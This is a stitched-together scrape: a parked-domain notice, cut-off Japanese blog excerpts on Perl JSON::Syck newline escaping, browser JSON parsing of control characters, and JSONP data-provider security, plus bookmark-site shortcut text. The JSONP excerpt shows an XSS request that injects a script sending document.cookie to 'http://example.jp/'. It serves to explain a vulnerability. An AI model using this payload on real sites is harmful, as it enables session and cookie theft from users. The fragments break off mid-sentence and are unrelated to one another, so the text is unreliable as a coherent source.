This domain name has been registered with Gandi.net. It is currently parked by the owner.
Perl の JSON::Syckでデータに改行が含まれるオブジェクトを Dump すると、以下のような出力が得られる。 $ perl -de0 DB<1> use JSON::Syck DB<2> $data = { foo => "xxx\nyyy" } DB<3> p JSON::Syck::Dump($data) {"foo":"xxx\n\ yyy"}読みやすくするためか、改行コードを \ でエスケープした形式。 JSON.pm だと改行コードは含まれない。 DB<4> use JSON DB<5> p objToJson($data) {"foo":"xxx\nyyy"}で、JSON::Syck が出力するデータは JavaScript の eval では parse できるが、json.org の json.js や、Jemplate(0.18) 附属の Jemplate.j
IE、 Firefox、 Safari ともに ECMAScript の仕様を満たしていません。IE6 は ECMAScript の仕様に対して上位互換だと言えるでしょうから、実質的に問題を抱えているのは Firefox のみ、ということになるのでしょうか。JSON を使う際には、注意が必要、と。 Firefox に関して言えば、 (Control Character があるとエラーになるのではなく読み落とすという性質からして) 仕様ではなくバグだと考えるのが妥当なのかなと思いました。 参考: テストコード 10:28 追記: NUL 文字について表に含めるのを忘れていたので追加しました 10:48 追記: Safari を追加 2009/02/17 追記: Firefox のバグは 2008 年 8 月に修正されたようです (ChangeLog の3.147)
« E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く